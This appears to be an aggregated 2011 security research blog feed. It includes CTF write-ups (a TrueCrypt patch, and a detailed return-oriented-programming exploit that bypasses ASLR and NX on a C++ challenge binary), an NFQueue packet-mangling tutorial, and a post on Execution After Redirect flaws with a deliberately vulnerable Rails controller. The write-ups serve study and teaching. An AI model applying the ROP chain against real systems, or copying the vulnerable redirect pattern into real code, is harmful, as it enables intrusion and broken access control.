+                       ConstBufferPtr cbpm = (ConstBufferPtr( (TrueCrypt::byte*) buffer +32, 32));
+                       //mode->SetKey (header.GetRange (offset + ea->GetKeySize(), ea->GetKeySize()));
+                       mode->SetKey (cbpm);
+
}
else
{

Mounting the Volume

In order for TrueCrypt to reach the patched code it must first correctly decrypt a valid header. So we copy the header from an identically sized TrueCrypt volume configured with the default parameters:

$ dd of=ppp.challenge.vol if=weknowthepasswd.vol bs=512 count=1 conv=notrunc

and open ppp.challenge.vol with the patched TrueCrypt software and find the file KEY.TXT in the correctly decrypted volume.

 

Summary

This was a really nice challenge letting us explore TrueCrypt internals. If you think this is too complicated – you are right. You can also solve the challenge with available tools: http://www.lestutosdenico.com/tutos-de-nico/write-up-fun-with-firewire-plaidctf 

People involved in solving this challenge: Clemens Hlauschek, Michael Weissbacher

by Michael at May 18, 2011 04:26 AM

May 10, 2011

Yan Alexandrovich Shoshitaishvili

NFQueue packet mangling with Python

In Linux, IPTables provides a pretty slick functionality to drop packets to userland to mangle or analyze them before returning them back to the kernel. Normally, this is done with C, but there are also bindings to friendlier languages, such as Python. Unfortunately, these bindings have very little documentation. While there are some examples for simple accept/reject decisions (https://www.wzdftpd.net/blog/index.php?post/2008/06/01/22-nfqueue-bindings and http://184.73.202.106/a/content/2010-08-01/instant-steganography-scapy-and-nfqueue), there seems to be a lack of more intricate showcases of this capability.

Well, today we push the envelope!

I was writing something for which I needed to drop packets to userland, mangle them, and then hand the modified version back to the kernel. The approach is pretty much identical to the nfqueue part of the posts linked to earlier with the exception of the method of setting the verdict, which took me a little while to track down. Basically, we first set up the iptables rules:


# iptables -A OUTPUT -p tcp -j NFQUEUE

Then, in our code, we do the standard nfqueue stuff (none of this is really different from what's linked to above):


import nfqueue
q = None
def cb(dummy, payload):
        ... 
q = nfqueue.queue()
q.open()
q.bind(socket.AF_INET)
q.set_callback(cb)
q.create_queue(0) 
try:
        q.try_run()
except KeyboardInterrupt:
        print "Exiting..." 
q.unbind(socket.AF_INET)
q.close()

All the interesting stuff happens in the callback function. For example, if we wanted to (using scapy) change the ttl of all outgoing packets to 10, we would do:


from scapy.all import IP
def cb(dummy, payload):
        pkt = IP(payload.get_data())
        # set the TTL
        pkt.ttl = 10
        # clear the IP checksum so that Scapy recalculates it, since we modified the IP header
        del pkt.chksum
        # reinject the packet!
        payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(pkt), len(pkt))
 
And that's it. Basically, we're using the set_verdict_modified() function instead of set_verdict(), and it takes the verdict, the modified packet, and the length of the modified packet as arguments. Of course, for something simple like setting the TTL, you can just use iptables without dropping the packet to userland, but this should illustrate the basic idea.

Keep in mind that since you're mangling packets, you might screw up the behavior of the underlying applications. For example, if you inject extra data into or remove data from a TCP packet, you might screw up the sequence numbers and pretty much break the connection. Good luck!

by Zardus (noreply@blogger.com) at May 10, 2011 12:34 AM

April 29, 2011

Gianluca Stringhini

PlaidCTF 2011 Challenge #17: C++5x writeup

This is a challenge that required a lot of work from Zardus and me, but we think that the solution we came up with is really interesting. Some other teams apparently just disabled libc ASLR to make things easier, instead we dynamically calculated the address of the exec() we wanted to call, and jumped to it.

The challenge involved a C++ binary with the following usage:


  # ./first_cpp
  Usage: ./first_cpp <name> <point>


The binary creates a C++ object (which has one method) on the stack in main(), and then calls a function which has an unrestricted buffer overflow followed by a call to the aforementioned method. As well as the overflow, the second function conveniently copies part of the buffer into the bss.

  void __cdecl stupid_function(int obj_ptr, int points, int name_ptr)
  {
    char src; // [sp+26h] [bp-32h]@1

    sprintf(&src, "Uploading... [%s]: %d pts\n", name_ptr, points);
    memcpy(s, &src, 0x32u);
    (**(int (__cdecl ***)(_DWORD, _DWORD))obj_ptr)(obj_ptr, s);
    send_to_localhost();
  }



It is important to note that the function with the overflow never returns, send_to_localhost() calls exit() after sending a UDP packet to localhost containing the points variable.

Normally, exploiting this would be a piece of cake. However, the machine had both ASLR and NX enabled and functional. A further complication was the absense of any helpful libc calls in the GOT due to the fact that the binary does not call such functions.

The answer lies in the method call. Since the C++ object resides on the stack, and we can overwrite it with the buffer overflow, we can change the address that is eventually called. A C++ method call in such a fashion consists of the following instructions:


  mov     eax, [ebp+obj_ptr]
  mov     eax, [eax]
  mov     edx, [eax]
  mov     dword ptr [esp+4], offset s
  mov     eax, [ebp+obj_ptr]
  mov     [esp], eax
  call    edx


The first mov dereferences the pointer (passed as an argument to the function) into the location of the object on the stack (the first word of which is the location of the virtual table for the object). The second mov acquires the address of the virtual table, and the third mov gets the address of the function to be called. The exploit involves overwriting the object on the stack to point to our own fake virtual table, which is conveniently copied for us into the bss. Luckily, the bss remains stable in memory, which makes this task fairly easy.

The general idea of the exploit is as follows: first, we acquire the address of a libc function that *is* in the GOT into eax. Then, using the offset between that function and a call to exec (we didn't use system() because system() drops privilages), we increment eax until it is pointing to the exec call. Finally, we jump to a "call eax" instruction. This works because even though libc is in a random location, the relative offsets between the functions are the same. We calculated the offset by subtracting the address of the libc function from the address of the exec call in gdb on the target machine:


  (gdb) p atoi
  $5 = {int (const char *)} 0xf7d50b40
  (gdb) x/i do_system+1128
     0xf7d5c398 : call   0xf7dbc3f0 <__execve>
  (gdb) p 0xf7d5c398 - 0xf7d50b40
  $6 = 47192


In order to carry out our exploit, we ended up using some pretty intricate return-oriented programming. We found several gadgets to help us:

  1. POP_RET: a simple pop, return gadget at 0x080487a1 to clean up the stack after a call
  2. POP3_RET: a simple pop, pop, pop, return gadget at 0x08048a2f for the same reason
  3. JUST_RET: a ret instruction at 0x08048a32 to ret to our next destination
  4. LEAVE_RET: a leave, ret gadget at 0x080487a1
  5. The sprintf stub function call, always at 0x080485ec
  6. A piece of code at 0x08048949 which reads a local variable into eax and eventually calls sendto:

      mov eax, [ebp-0x1C]
      mov [esp], eax
      call _sendto

  7. A piece of code at 0x0804890f which adds 8 to eax and soon calls bzero:

      add eax, 8
      mov [esp], eax
      call _bzero

  8. A piece of code at 0x0804879F which calls eax

The beginning of our exploit is:

  -------- copied into bbs ---------
  00. "AAAA"
  04. "AAAA"
  08. "AAAA"
  12. POP3_RET
  16. POP_RET
  20. "\xe2\x9d\x04\x08"
  24. "\xea\x9d\x04\x08"
  28. LEAVE_RET
  32. "%.4s"
  -------- on the stack ---------
  36. "BBBB"
  40. POP_RET
  44. "\xe6\x9d\x04\x08"


The first 36 bytes are conveniently copied into the bbs, and are used through the rest of the return-oriented program. When the buffer is overflowed, (44) ends up getting written over the virtual table pointer for the C++ object. It then resolves to (24), which resolves to (28). The program then calls LEAVE_RET, which moves ebp (currently pointing at 36) back to esp, allowing us to bypass the inconvenient values on the stack which were copied into the bss. "BBBB" is popped into ebp and we return to the POP_RET instruction (40). This POP_RET allows us to skip over the fake virtual table pointer on the stack. Then the following happens:


  48. POP_RET
  52. "\xe6\x9d\x04\x08"


This pops an address (52) into ebp and returns again. We did this so that ebp would point to writeable memory, as functions sometime expect it to do that. After this, we copy atoi's address to get ready to read it:


  56. "\xec\x85\x04\x08"
  60. POP3_RET
  64. "\xd4\x9d\x04\x08"
  68. "\xee\x9d\x04\x08"
  72. "\x58\x9d\x04\x08"


(56) is the address of sprintf, which we will use to overwrite memory addresses. The destination, (64), lies in the dtors section. We chose arbitrarily for some storage space. The format string, (68), is a pointer to (32) on the bss, and copies 4 bytes. Finally, the argument, (72), is a pointer to atoi's entry in the GOT. We set sprintf's return address (60) to POP3_RET, which cleans the arguments off the stack. After this, we have atoi's address at 0x08049dd4. Now we do a bit of cleanup for future actions:


  76. "\xec\x85\x04\x08"
  80. POP3_RET
  84. "\x3c\x9d\x04\x08"
  88. "\xee\x9d\x04\x08"
  92. "\xda\x9d\x04\x08"

  96. "\xec\x85\x04\x08"
  100. POP3_RET
  104. "\x64\x9d\x04\x08"
  108. "\xee\x9d\x04\x08"
  112. "\xda\x9d\x04\x08"


These two blocks use sprintf to overwrite the GOT entries to sendto (84) and bzero (104). Both of them are overwritten with the value of POP3_RET (12) in bss, which has the result of turning both sendto and bzero into a pop,pop,pop,ret gadget. Then, we move on:


  116. POP_RET
  120. "\xe0\x9d\x04\x08" # 0x8049dec -- where we wrote - 1C
  124. "\x49\x89\x04\x08" # get atoi address into eax
  128. JUST_RET
  132. JUST_RET
  136. JUST_RET
  140. JUST_RET


(116) pops (120) into ebp, which is (64), the address where we copied atoi's address, plus 0x1C. It then returns to (124), which is code gadget (6). This has the effect of moving atoi's address into eax. That gadget ends up calling sendto, which is now POP3_RET, which ends up cleaning up our stack (including the unwanted return address that the call instruction pushes) and returning. We then return to:


  for i in range(5883):
    144. "\x0f\x89\x04\x08"
    148. "AAAA"
    152. "AAAA"


This is an unrolled loop that essentially increments eax by 8 using code gadget (7), which is located at (144). Since that code gadget ends in a call to bzero, which is now POP3_RET, which pops off the return address and (148) and (152) and returns back to the code gadget. This runs 5883 times, which is the distance between atoi and the execve call (47064) divided by 8. Finally, we return to code gadget 8:


  156. "\x9f\x87\x04\x08"
  160. "\xf2\x9d\x04\x08"
  164. "\xf2\x9d\x04\x08"


(160) and (164) point to zero-filled space in the bss for the args and env of the execve call. The program name, unfortunately, is co-opted by the call instruction pushing the return value. Luckily, that return value points to a "string" in the code section and we can create the appropriate file.

And, after all that horror, we're done!

by Gianluca Stringhini (noreply@blogger.com) at April 29, 2011 02:31 PM

April 21, 2011

Adam Doupé

Overview of Execution After Redirect Web Application Vulnerabilities

Hi all, I’m here to talk about a little known web vulnerability that Bryce Boe already touched on. Execution After Redirects are logic flaws in web applications that can lead to Information Disclosure and Broken Access Controls.

What’s an EAR?

Well, an Execution After Redirect (EAR) flaw is when a developer causes an HTTP redirect to occur, typically via a web framework. The developer assumes that execution stops after the redirect, however, execution continues.

Let’s look at a Ruby on Rails example (names have been changed to hide the guilty):

class TopicsController < ApplicationController
  def update
    @topic = Topic.find(params[:id])
    unless current_user.is_admin?
      redirect_to "/"
    end
    if @topic.update_attributes(params[:topic])
      flash[:notice] = "Topic updated!"
    end
  end
end

It appears that if the current user is not an admin, they are redirected to “/”, the web site root. In fact, if you access the update controller using a browser while not an admin, it will redirect you to the web site root like expected. However, if an attacker who is not an admin makes a request with topic parameters, she will be able to update your topic without being an admin!

How do I fix it?

The fix is pretty simple, always return after a redirect!

EARs can be more complicated. For example, there’s a controller that calls a method that calls a redirect. The real fix is to know where your redirects are, and what they’re for, especially if you use a redirect during authentication.

What else is vulnerable?

Web application frameworks differ on if they stop execution after a redirect. Check your web framework’s documentation to see if the redirect method stops execution.

What am I doing about it?

Bryce Boe and I are writing a paper studying this problem in depth. However, since I am alerting developers to potential EARs in their code, I wanted to have this informational blog post giving an overview. In addition, I developed a tool to staticially detect EARs in Ruby on Rails. Look for more blog posts in the future about the tool.

Permalink | Leave a comment  »

April 21, 2011 03:23 AM

January 27, 2011

Adam Doupé

Paper Review: Saner: Composing Static and Dynamic Analysis to Validate Sanitization in Web Applications.

What is this?

In an effort to improve my writing and analysis skills, I’m going to review papers using less than 500 words. This is my first attempt.

Overview

Saner: Composing Static and Dynamic Analysis to Validate Sanitization in Web Applications is a paper written by Davide Balzarotti et. al., and was published at the IEEE Symposium on Security and Privacy in 2008.

Saner attempts to solve the problem of verifying the correctness of sanitization functions. Previous work on analyzing web applications for vulnerabilities assume that built-in sanitization functions completely protect the application from vulnerabilities. This assumption is typically extended to custom sanitization functions (regular expressions, string replacements, etc.)

Proper analysis of sanitization functions would enable a tool to be more precise about the vulnerabilities that it discovers. It can also be used to analyze a language’s built-in sanitization functions.

Saner utilizes static and dynamic approaches to analyze sanitization functions.

The static part was built by extending Pixy to keep track of the string values that each variable can hold. Saner can see if a variable can be used as output and if it is used in the output. However, the method used to keep track of the string values is an over-approximation, which might produce false-positives (but not false-negatives).

A dynamic approach is used to reduce the number of false-positives by generating inputs and seeing if those inputs trigger a vulnerability. In this way, Saner can present all the verified vulnerabilities, but if the user wishes, also present all the possible vulnerabilities so the user can investigate.

Thoughts

Possible Problems

Saner inherits the same limitations as Pixy, namely it does not support PHP’s eval function and aliased array elements.

Future Work

Context-aware

An extension to this (and other static web analyzers) would be to use the context of a variables output in the HTML page. For instance, variables that output to the headers of an HTTP response are vulnerable to HTTP Response Splitting and need to disallow ‘\r’ and ‘\n’, while these characters are safe when output in the HTML response. Another example is a variable that is output after a starting script tag but before the ending tag to customize the JavaScript sent to the user. Here’s a simple example of this:

<script>
var userName = "<?php echo $userName; ?>";
</script>

In this case, restricting only ‘<’ and ‘>’ will not work. The idea of context can be extended to attributes of HTML tags.

Database-aware

Another problem is how to treat variables from the database: are they sanitized or not? A static analyzer that is able to properly model and taint the flow of data into and out of the database would be very cool (and if you know of someone who’s done this, let me know).

Permalink | Leave a comment  »

January 27, 2011 06:08 PM